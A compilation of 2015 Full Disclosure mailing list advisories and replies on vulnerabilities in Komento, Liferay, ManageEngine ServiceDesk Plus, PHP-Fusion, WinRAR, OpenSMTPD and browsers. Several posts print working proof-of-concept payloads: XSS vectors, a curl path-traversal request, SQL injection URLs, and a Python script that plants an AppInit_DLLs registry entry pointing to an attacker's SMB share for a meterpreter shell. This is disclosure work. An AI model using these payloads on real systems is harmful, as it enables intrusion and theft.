[FD] Komento Joomla! component Persistent XSS

[David Sopas]

CVE Reference: CVE-2015-7324
Original advisory:
https://www.davidsopas.com/komento-joomla-component-persistent-xss/
Author: David Sopas @dsopas

Komento is a Joomla! comment extension for articles and blogs in K2,
EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.

@http://stackideas.com/komento

I found out that was possible to launch a Persistent XSS attack when
adding a new comment using the WYSIWYG website and image buttons.
This issue was critical in both environments - frontend and backoffice.

In frontend when a user visited a page where the comment has a XSS
attack it would be automatically affected.
In the other side - the backoffice - when the admin checked the new
comment it would be vulnerable to this attack and could get his
account hijacked or something even more dangerous.

What I did was to pass along the XSS vector in the [img] code and use
the Javascript onload to run the exploit when image loads.

Proof-of-concept using [img]:
[img]http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg";
onload="prompt(1)[/img]

Proof-of-concept using [url]:
[url="https://www.davidsopas.com"; onmouseover="prompt(1)"]Your text to
link[/url]

In the [img] case this will reflect the following HTML (on the frontend):

http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg";
data-pagespeed-onload="prompt(1)"
alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg";
onload="prompt(1)" style="max-width:300px;max-height:300px;"
onload="var elem=this;if (this==window)
elem=document.body;elem.setAttribute('data-pagespeed-loaded', 1)"/>

And...

http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg";
data-pagespeed-onload="prompt(1)"
alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg";
onload="prompt(1)" style="max-width:300px;max-height:300px;">

In the administrator area.

This Joomla! component has lot’s of Google results and can affect a
large number of innocent people. A victim just by visiting the page
with a malicious comment will be affected.

All versions prior to 2.0.5 are affected.
Vendor already patched both security issues in the new version 2.0.5 -
http://stackideas.com/changelog/komento

-David Sopas
davidsopas.com
@dsopas

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Charter Spectrum Business HTTP MITM

[Mark Felder]

Hello,

You probably don't need to be told otherwise, but do not trust Charter
(or any ISP) with your HTTP traffic even if you're paying for a business
connection and expect internet without tampering or analysis. I recently
started receiving redirects to a Terms & Conditions page on IPv4 HTTP
traffic. My tests indicate they don't do it with IPv6 through their 6rd
Border Relay and of course they can't do it with HTTPS. Surprisingly
most of my traffic avoids IPv4 HTTP so I am not sure how long this has
been going on.

They insert RST packets and then redirect you to a page to present you
new T&C they want you to accept. The URL looks like this:

http://tandc-browsermessaging.charter.net/?sub=ctgcw67P4wwQS1UWxrkXpw%7CzDWlBWA5zOMe_UlM2CDTNrvyOKhDVmmHD7FsEYdrkAGchiHqZj0U-x7_udYQ1hOM3hHa-exjfm0I0aU0rNGXvOwNLaMhjs6DcqDCqHFaaNPd_oJPhAW98gaC05D_bhpF-mss5gQIkstxEUxEOpezjQ&originalURL=http%3A//seclists.org/fulldisclosure/&ack=24.217.29.129

I've attached a packet dump of this in action.


Stay safe


charter.pcapng
Description: Binary data

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Sicherheitslücke - Liferay Portal Enterprise Edition

[Tim Schughart]

Hey guys,

during a penatrationtest I have found an unknown persistent xss in liferay 
portal backend.

##
#General Information#
##


Manufacture description:
Liferay Portal is an enterprise-web-platform for the development of business 
solutions, which provides quick results and long-term values.



#Details#

· Product:  Liferay Portal 
Enterprise Edition (6.2 EE SP13)
· Affected versions :   All <= 6.2 EE SP13
· Type of attack:   Persistent  Cross Site 
Scripting
· Proof Of Concept: Yes, 6.2 EE SP13
· Authentication required:  Yes
· Reason:   Missing input validation
· Impact:   Injection of 
malicious  JavaScript code

##
#PoC#
##
You have to be authenticated in the administrator backend.
Here you have to browse to the control center:
- In configuration click on portal settings
- Select authentication
- Select ldap
- select add server
- input following code in server name

Value for ldap server name field:
Name_of_ldap_serveralert("XSS")

The script is inserted to the configuration page persistent until the ldap 
server is deleted from database again.

Best regards / Mit freundlichen Grüßen

Tim Schughart
CEO | IT Security specialist



ProSec Networks
Website: http://www.prosec-networks.com 
E-Mail: i...@prosec.networks.com 
Phone: +49(0) 2621 9469 252

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz."






signature.asc
Description: Message signed with OpenPGP using GPGMail

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal

[xistence]

Exploit Title: ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path
Traversal
Product: ManageEngine ServiceDesk Plus
Vulnerable Versions: 9.1 build 9110 and previous versions
Tested Version: 9.1 build 9110 (Windows)
Advisory Publication: 03/10/2015
Vulnerability Type: Unauthenticated Path Traversal
Credit: xistence 

Product Description
---

ServiceDesk Plus is an ITIL ready IT help desk software for organizations
of all sizes. With advanced ITSM functionality and easy-to-use capability,
ServiceDesk Plus helps IT support teams deliver world-class services to end
users with reduced costs and complexity. Over 100,000 organizations across
185 countries trust ServiceDesk Plus to optimize IT service desk
performance and achieve high user satisfaction.


Vulnerability Details
-

The "fName" parameter is vulnerable to path traversal without the need for
any authentication.
On Windows environments, downloading files will be done with SYSTEM
privileges. This makes it possible to download any file on the filesystem.

The following example will download the "win.ini" file:

$ curl "
http://192.168.2.129:8080/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


Solution


Upgrade to ServiceDesk 9.1 build 9111.


Advisory Timeline
-

07/10/2015 - Discovery and vendor notification
07/10/2015 - ManageEngine responsed that they will notify their development
team
09/13/2015 - No response from vendor yet, asked for status update
09/24/2015 - ManageEngine responded that they've fixed the issue and
assigned issue ID: SD-60283
09/28/2015 - Fixed ServiceDesk Plus version 9.1 build 9111 has been released
10/03/2015 - Public disclosure

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Watch your Downloads: the risk of the "auto-download" feature on Microsoft Edge and Google Chrome

[Haifei Li]

This is a copied version of my blog post, original version 
http://justhaifei1.blogspot.com/2015/10/watch-your-downloads-risk-of-auto.html.Probably
 it's commonly known that when you try to download something on your modern 
browser e.g. Google Chrome or Microsoft Edge, the file will be downloaded 
automatically to your local system with just a simple clicking - no need for 
additional confirmations. With default settings, the file will be downloaded to 
your "Downloads" folder ("C:\Users\\Downloads").
Personally, I have worried about this feature quite some times, now I finally 
got some time on highlighting this. (Please tell me if there's someone already 
talked about this, I quickly googled around and wasn’t able to find an 
appropriate one, I think it should be known by many ppl).

The "auto-download" feature is good from “user experience” perspective, but 
obviously it's not good for security, as the downloading could also be started 
by Javascript (). The attacker may just place a malicious DLL 
with a specific name into the "Downloads" folder when the victim visits a 
webpage he/she controls. In future, when the victim tries to download/install 
good programs (executables) from legitimate websites - of course, the good 
executable will be downloaded, and will be launched from the "Downloads" folder 
as well - then the installation/execution progress could be hijacked.

This is because that in the real world, most executables replying dlls. Anyway, 
the "application directory" is the very first place in the search order when 
searching/loading for a dll (yoy may want to check this paper I released years 
ago). So, probably, most of dlls even the system dlls could be hijacked when 
you place a same-named dll in the executable’s directory, and that's not for 
the situation that the searching dll is not in anywhere of your system.

Usually, the "Downloads" folder is a place with massive downloaded files, so 
the victim probably never get a change to realize there is a malicious DLL 
sitting in his/her "Downloads" folder. I’d also doubt that even a normal user 
notices a strange dll in his/her "Downloads" folder, does he/she will really 
delete it immediately? DLLs won’t be executed by themselves anyway, right?

Anyway, in the real world, for most people, who really check their "Downloads" 
folder every time when they try to install something from internet? Instead, 
most people just click the "Run" button directly when installing something (see 
following figure).




I have quickly made a video showing this risk. The test environment is Windows 
10 Pro, with Microsoft Edge and Google Chrome, fully updated as of Oct 2nd, 
2015, all with default settings. Check it out here.


As you may have noted, a modified “VERSION.DLL” will be dropped into the 
“Downloads” folder when visiting the webpage 
https://dl.dropboxusercontent.com/u/14747595/auto_download_test/test.html. 
Then, when the user tries to install Adobe Reader from the official adobe.com 
website, the installation process of Adobe Reader will be hijacked - the 
modified “VERSION.DLL” will be loaded and my shellcode will be executed.

There’s one small thing, the code execution should be run out of the browser 
sandbox, but unluckily the tested shellcode I copied from internet runs 
calc.exe, and because there’s no calc.exe anymore on Windows 10, what you’ve 
seen it’s just a Calculator App which runs within the App Container sandbox. 
Other shellcode, for example, running notepad.exe, will be run out of the App 
Container sandbox and give the attacker control of your system. 
#BringTheLovelyCalcBackMicrosoft!

Also note that with default setting, the Microsoft Edge will promote a warning 
dialog saying the DLL is dangerous, offering the user an option to delete the 
file.




But:
1) Anyway, the DLL has been already dropped into the "Downloads" folder, if the 
user chooses not to delete the file or just do nothing, future execution will 
still be hijacked.2) I also guess this Microsoft Edge warning could be bypassed 
if the DLL is a signed DLL, but I don't have a certificate to test.
On Google Chrome, as you have seen, there's no warning at all.
Thanks,Haifei

  

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Qualys Security Advisory - OpenSMTPD Audit Report

[Qualys Security Advisory]

(Sorry for the "CVE-2015-ABCD" place-holders in the report, but
OpenSMTPD's developers were ready with the patches before MITRE was
ready with the CVE-IDs.)


Qualys Security Advisory

OpenSMTPD Audit Report



Contents


Summary
Approach
Local Vulnerabilities
Remote Vulnerabilities
Inter-Process Vulnerabilities
Miscellaneous Bugs
Acknowledgments



Summary


For the past few months, one of our background projects has been to
audit OpenSMTPD, a free implementation of the server-side Simple Mail
Transfer Protocol (SMTP). OpenSMTPD replaces Sendmail as OpenBSD's
default Mail Transfer Agent (MTA) since OpenBSD 5.6, released on
November 1, 2014.

OpenSMTPD was designed to be secure, reliable, performant, and easy to
configure. Indeed, its codebase lives up to OpenBSD's reputation: it is
clean, modular, privilege-separated, and made our audit easy and really
enjoyable. However, the project is pretty much in its infancy (the first
stable version, 5.3, was released on March 17, 2013), which explains why
we discovered various vulnerabilities during our security assessment:

- an oversight in the portable version of fgetln() that allows attackers
  to read and write out-of-bounds memory;

- multiple denial-of-service vulnerabilities that allow local users to
  kill or hang OpenSMTPD;

- a stack-based buffer overflow that allows local users to crash
  OpenSMTPD, or execute arbitrary code as the non-chrooted _smtpd user;

- a hardlink attack (or race-conditioned symlink attack) that allows
  local users to unset the chflags() of arbitrary files;

- a hardlink attack that allows local users to read the first line of
  arbitrary files (for example, root's hash from /etc/master.passwd);

- a denial-of-service vulnerability that allows remote attackers to fill
  OpenSMTPD's queue or mailbox hard-disk partition;

- an out-of-bounds memory read that allows remote attackers to crash
  OpenSMTPD, or leak information and defeat the ASLR protection;

- a use-after-free vulnerability that allows remote attackers to crash
  OpenSMTPD, or execute arbitrary code as the non-chrooted _smtpd user;

- multiple inter-process vulnerabilities that allow attackers to
  escalate from one (already-compromised) OpenSMTPD process to another.



Approach


The OpenSMTPD version that we audited is available at:

https://www.opensmtpd.org/archives/opensmtpd-5.4.4p1.tar.gz

and is installed by default on OpenBSD's latest release (OpenBSD 5.7,
released on May 1, 2015). Unless otherwise noted, the vulnerabilities
that we discovered in OpenSMTPD 5.4.4p1 affect OpenSMTPD's latest
release as well (OpenSMTPD 5.7.1p1, released on June 30, 2015).

The "hybrid approach" that we adopted to review OpenSMTPD is described
in the bible of code auditing, "The Art of Software Security Assessment"
(by Mark Dowd, John McDonald, and Justin Schuh):

- We started with a "top-down approach" and reviewed the high-level
  information that we gathered on OpenSMTPD: READMEs, manual pages, web
  pages (https://www.opensmtpd.org/presentations/asiabsdcon2013-smtpd/
  and https://www.poolp.org/).

  This approach allowed us to quickly understand OpenSMTPD's design
  (seven privilege-separated, long-running, and event-driven processes
  that communicate through UNIX sockets and the imsg API) and identify
  its attack surface (local, remote, and inter-process entry points).

- We continued with a "bottom-up approach" and reviewed OpenSMTPD's
  implementation: the lowest-level code first (openbsd-compat/ and
  smtpd/mproc.c), followed by the higher-level code.

  This approach allowed us to quickly identify complex vulnerabilities:
  the remote out-of-bounds memory read and use-after-free are actually a
  combination of several low-level and high-level bugs.


Privilege Separation


--[ PROC_PARENT ]---

User: root

Chroot: no

Peers: PROC_CONTROL, PROC_LKA, PROC_QUEUE, PROC_CA, PROC_PONY

PROC_PARENT, the "[priv]" process, spawns the six other long-running
processes at startup (by calling fork_peers() from main()), and the
transient Mail Delivery Agent (MDA) processes on demand (by calling
forkmda() from parent_imsg()).

If any of its long-running children dies, PROC_PARENT calls
parent_shutdown(), kill()s its remaining children, and exit()s, but does
not restart automatically: if we try to exploit a memory corruption, we
have to come up with a one-shot, not a b

[FD] CVE-2015-6237 - Tripwire IP360 VnE Remote Administrative API Authentication Bypass/Privilege Acquisition Vulnerability

[Specto]

Document Title

Tripwire IP360 VnE Remote Administrative API Authentication
Bypass/Privilege Acquisition Vulnerability


Affected Products
===
Vendor: Tripwire
Software/Appliance: IP360 VnE Vulnerability Manager
Affected (verified) versions: v7.2.2 -> v7.2.5


CVE
=
CVE-2015-6237


CVSS
===
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/RL:O/RC:C
Base Score: 10.0
Temporal Score: 9.5


Rating
=
Critical


Vulnerability Summary
==

The IP350 VnE is susceptible to a remote XML-RPC authentication
bypass vulnerability, which allows for specially crafted privileged
commands to be remotely executed without authentication. The RPC
service is available on the public HTTPS interface of the VnE by
default, and cannot be disabled.


Impact


Successful exploitation will allow a remote unauthenticated
attacker to execute commands and queries against the API normally
only available to privileged users. Attack vectors include the
ability to enumerate all local/remote users, reset any password of
a user on the system, and manipulate IP filter restrictions for any
user. Users configured to use external authentication sources (e.g.
LDAP) can have a local password created and made usable by an
attacker while the authorized user continues to use external
authentication. The combined vectors could allow for remote
administrative privilege acquisition.


Remediation
=
Update to v7.2.6


Credits
==
This vulnerability was discovered and reported by Specto
(specto [at] custodela [dot] com).


Relevant Timeline


18/08/2015: Initial vendor contact
19/08/2015: Vulnerability provided to vendor
19/08/2015: Vulnerability accepted by vendor
25/08/2015: Vulnerability confirmed by vendor
30/09/2015: Update with vulnerability fix released by vendor
01/10/2015: Advisory posted

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Telegram - Multiple Vulnerabilities

[Uni Sec]

Could you be a little more clear with the process for number 5, the account 
hijack and contact import? Isn't intercepting the 5-digit code sufficient to 
gain account takeover?
-J
> Date: Tue, 29 Sep 2015 18:53:52 -0300
> From: edu...@gmail.com
> To: fulldisclosure@seclists.org
> Subject: [FD] Telegram - Multiple Vulnerabilities
> 


> #[5] Hijacking account and importing contacts
> 
> If the victim uses only the passcode as two-step verification, we can reset
> her account, and as a result, the attacker creates the possibility for
> importing contacts and hijacking the account:
> 
> 
> - Attacker asks for token using Telegram-Web
> - Obtains the code
> - Resets account
> - Waits for the victim to log-in
> - Imports contacts (auto)
> - Kills the victim's session
> - Enables Two-Step verification (passcode + email)
> 
> 
> 
> Thanks to:
> 
> Leandro Oliveira
> Joaquim Brasil
> Marcelo Pessoa
> Toronto Garcez
> Tiago Barbosa
> 
> From Tempest Security Intelligence
> 
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
  

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Apple Safari URI spoofing (CVE-2015-5764)

[Antonio Sanso]

tl;dr Apple Safari for OS X was prone to URI spoofing vulnerability  (and more 
general a user interface spoofing). Apple released security updates for Safari 
9 on OS X and assigned CVE-2015-5764. 
Accidentally this vulnerability was also present in iOS.

Instant demo
In Safari up to 8.0.8 :

  *   go to https://asanso.github.io/CVE-2015-5764/file0.html
  *   click "click me!"
  *   notice the address bar being "data:text/html,%3CH1%3EHi!!%3C/H1%3E"
  *   go back using the browser button
  *   click "click me!"
  *   notice the address bar being 
http://www.intothesymmetry.com/CVE-2015-5764/file0.php 

You can find the details in 
http://intothesymmetry.blogspot.it/2015/09/apple-safari-uri-spoofing-cve-2015-5764.html

regards

antonio


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WinRar Settings Import Command Execution

[Rio Sherri]

#!/usr/bin/python -w

# Title : WinRar Settings Import Command Execution

# Date : 02/10/2015

# Author : R-73eN

# Tested on : Windows 7 Ultimate

# Vulnerable Versions : Winrar < 5.30 beta 4

# The vulnerability exists in the "Import Settings From File" function.

# Since Settings file of Winrar are saved as a registry file and WinRar
executes

# it in an automatic way without checking if it is writing to the Registry
keys

# used by winrar, we can create a specially crafted settings file and we
can

# overwrite registry keys.

# Since we have access to registry there are various ways we could use this
to

# get code execution such as defining "RUN" keys or creating new services
etc

# However the best way to get code execution is using AppInit DLLs

# AppInit DLLs are DLLs that are loaded into any process when it starts.

# In this case, we can specify a meterpreter DLL payload using a UNC path on

# an SMB server we control and then next time a new process starts we will

# get a shell.

# Read more about AppInit Dlls :
https://support.microsoft.com/en-us/kb/197571

#

# Triggering the vulnerability

# 1) Run this python script.

# 2) Open WinRar

# 3) Click Options

# 4) Click Import/Export

# 5) Import Settings from file

# 6) Select the Specially crafted Settings.reg file

#

# Disclosure Timeline:

# 01/10/2015 - Vendor Contacted POC provided

# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify

# presence of [HKEY_CURRENT_USER\Software\WinRAR] or

# [HKEY_CURRENT_USER\Software\WinRAR\

#

#


banner = ""

banner +=" ___ __  _ _ \n"

banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"

banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"

banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"

banner +=" |___|_| |_|_| \___/ \|\___|_| |_| /_/ \_\_|\n\n"

print banner

print "[+] WinRar Settings Import Command Execution [+]\n"

dll = raw_input("[+] Enter dll location (smb) : ")

dll = dll.replace("\\","")

print "[+] Writing Contet To Settings.reg [+]"

evil = 'Windows Registry Editor Version
5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll +
'"\n"LoadAppInit_DLLs"=dword:0001\n'

print evil

f = open("Settings.reg","w")

f.write(evil)

f.close()

print "[+] Settings.reg created successfully [+]"

print "\n https://www.infogen.al/ \n"

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Persistent XSS - Liferay Portal Enterprise Edition

[Tim Schughart]

Hey guys,

during a penatrationtest I have found an unknown persistent xss in liferay 
portal backend.

##
#General Information#
##


Manufacture description:
Liferay Portal is an enterprise-web-platform for the development of business 
solutions, which provides quick results and long-term values.



#Details#

· Product:  Liferay Portal 
Enterprise Edition (6.2 EE SP13)
· Affected versions :   All <= 6.2 EE SP13
· Type of attack:   Persistent  Cross Site 
Scripting
· Proof Of Concept: Yes, 6.2 EE SP13
· Authentication required:  Yes
· Reason:   Missing input validation
· Impact:   Injection of 
malicious  JavaScript code

##
#PoC#
##
You have to be authenticated in the administrator backend.
Here you have to browse to the control center:
- In configuration click on portal settings
- Select authentication
- Select ldap
- select add server
- input following code in server name

Value for ldap server name field:
Name_of_ldap_serveralert("XSS")

The script is inserted to the configuration page persistent until the ldap 
server is deleted from database again.

Best regards / Mit freundlichen Grüßen

Tim Schughart
CEO | IT Security specialist



ProSec Networks
Website: http://www.prosec-networks.com 
E-Mail: i...@prosec.networks.com 
Phone: +49(0) 2621 9469 252

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz."


signature.asc
Description: Message signed with OpenPGP using GPGMail

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] WinRAR SFX v5.21 - Remote Code Execution Vulnerability

[Hernan Moller]

In fact, a SXF file type can only try to access a specific URL
(server's attacker). Then the attacker exploits a
Microsoft's vulnerability (ms14-064).

The WinRAR file doesn't allow RCE by itself.


--
Hernán Möller
http://nivel4.com


2015-09-28 5:39 GMT-03:00 Gynvael Coldwind :

> Correct me if I'm wrong, but the vulnerability can be summarized as: if you
> run an untrusted .exe you might execute malicious code?
>
> I hardly see this as giving anything new to the attacker who can just
> create a malicious exe file, set the winrar sfx icon and send it to the
> victim.
>
> Keep in mind that not every unexpected behavior or software bug is a
> security vulnerability.
>
> (and no, potential AV bypass doesn't make it a vulnerability either)
>
> Cheers,
> Gynvael
>
> On Mon, 28 Sep 2015 10:27 Vulnerability Lab <
> resea...@vulnerability-lab.com>
> wrote:
>
> > Document Title:
> > ===
> > WinRAR SFX v5.21 - Remote Code Execution Vulnerability
> >
> >
> > References (Source):
> > 
> > http://www.vulnerability-lab.com/get_content.php?id=1608
> >
> > Video: https://www.youtube.com/watch?v=fo0l0oT4468
> >
> >
> > Release Date:
> > =
> > 2015-09-28
> >
> >
> > Vulnerability Laboratory ID (VL-ID):
> > 
> > 1608
> >
> >
> > Common Vulnerability Scoring System:
> > 
> > 9
> >
> >
> > Product & Service Introduction:
> > ===
> > WinRAR with over 500 million users worldwide by far the most popular
> > compression program and therefore the best way to files securely and
> > efficiently to pack for a data transfer to speed up the data transfer via
> > e-mail and secure storage optimized files.
> >
> > (Copy of the Homepage: http://www.win-rar.com/start.html )
> >
> >
> > Abstract Advisory Information:
> > ==
> > An independent vulnerability laboratory researcher discovered a code
> > execution vulnerability in the official WInRAR SFX v5.21 software.
> >
> >
> > Vulnerability Disclosure Timeline:
> > ==
> > 2015-09-28: Public Disclosure (Vulnerability Laboratory)
> >
> >
> > Discovery Status:
> > =
> > Published
> >
> >
> > Exploitation Technique:
> > ===
> > Remote
> >
> >
> > Severity Level:
> > ===
> > Critical
> >
> >
> > Technical Details & Description:
> > 
> > A remote code execution vulnerability has been discovered in the official
> > WInRAR SFX v5.21 software.
> > The vulnerability allows remote attackers to unauthorized execute system
> > specific code to comrpomise a target system.
> >
> > The issue is located in the `Text and Icon` function of the `Text to
> > display in SFX window` module. Remote attackers are
> > able to generate own compressed archives with maliciuous payloads to
> > execute system specific codes for compromise. The attackers
> > saved in the sfx archive input the malicious generated html code. Thus
> > results in a system specific code execution when a target
> > user or system is processing to open the comprossed archive.
> >
> > The security risk of the code execution vulnerability is estimated as
> > critical with a cvss (common vulnerability scoring system) count of 9.2.
> > Exploitation of the code execution vulnerability requires low user
> > interaction (open file) without privilege system or restricted user
> > accounts.
> > Successful exploitation of the remote code execution vulnerability in the
> > WinRAR SFX software results in system, network or device compromise.
> >
> >
> > Proof of Concept (PoC):
> > ===
> > The code execution vulnerability can be exploited by remote attackers
> > without privilege system user account or user interaction.
> > For security demonstration or to reproduce the vulnerability follow the
> > provided information and steps below to continue.
> >
> > Manual steps to reproduce the vulnerability ...
> > 1.  Run perl code : perl poc.pl
> > 2.  Right Click on any file and select "add to archive..."
> > 3.  Select "Create SFX archive"
> > 4.  Go to the Advanced Menu and select "SFX options..."
> > 5.  Go to the "Text and icon" Menu
> > 6.  Copy this perl output (HTML) and past on "Text to display in SFX
> > window"
> > 7.  Click OK -- OK
> > 8.  Your SFX file Created
> > 9.  Just open sfx file
> > 10. Your Link Download/Execute on your target
> > 11. Successful reproduce of the code execution vulnerability!
> >
> >
> > PoC: Exploit Code
> > #!/usr/bin/perl
> > # Title : WinRaR SFX - Remote Code Execution
> > # Affected Versions: All Version
> > # Tested on Windows 7 / Server 2008
> > #
> > # Author: Mohammad Reza Espargham
> > # Linkedin: https://ir.linkedin.com/in/rezasp
> > # E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
> > # Website: www.reza.es
> > # Twitter: https://twitter.com/rezesp
> > # F

[FD] Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

[Manuel Garcia Cardenas]

=
MGC ALERT 2015-002
- Original release date: September 18, 2015
- Last revised:  October 05, 2015
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

II. BACKGROUND
-
PHP-Fusion is a lightweight open source content management system (CMS)
written in PHP.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application. It is possible to inject SQL
code in the variable "status" on the page "members.php".

IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
Blind SQL injection.

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0

Exploiting with true request (with mysql5):

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
AND substr(@@version,1,1)='5

Exploiting with false request:

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
AND substr(@@version,1,1)='4

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
PHP-Fusion <= v7.02.07

VII. SOLUTION
-
All data received by the application and can be modified by the user,
before making any kind of transaction with them must be validated.

VIII. REFERENCES
-
https://www.php-fusion.co.uk/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
September 18, 2015 1: Initial release
October 10, 2015 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
September 18, 2015 2: Send to vendor
September 24, 2015 3: Second mail to the verdor without response
October   10, 2015 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Watch your Downloads: the risk of the "auto-download" feature on Microsoft Edge and Google Chrome

[Lee]

Haifei Li, changing the default behavior to open a window asking the
user where to save the file would change nothing.  A "normal user"
would just click the "save" button to save the file in the default
folder.  I also don't think it should be the browser's responsibility
to look for potential malicious DLLs in that directory.  This "normal
user" may not even use the browser to execute this executable file so
they never even see this warning.

If you really want to pursue this problem, I think the OS (MS Windows)
is where you should be looking for a solution.

MS Windows has an "Open File - Security Warning" window before
executing untrusted files.  Again, a "normal user" just clicks "Run"
on that window without reading the warning, but this could be expanded
to also warn about potential malicious DLLs.  Example Image:
http://i.imgur.com/3dxQJCB.png

As long as a "normal user" is given enough privileges to
destroy/infect/... their OS, they will continue to be careless.  You
will never be able to protect these people from themselves.

-Lee


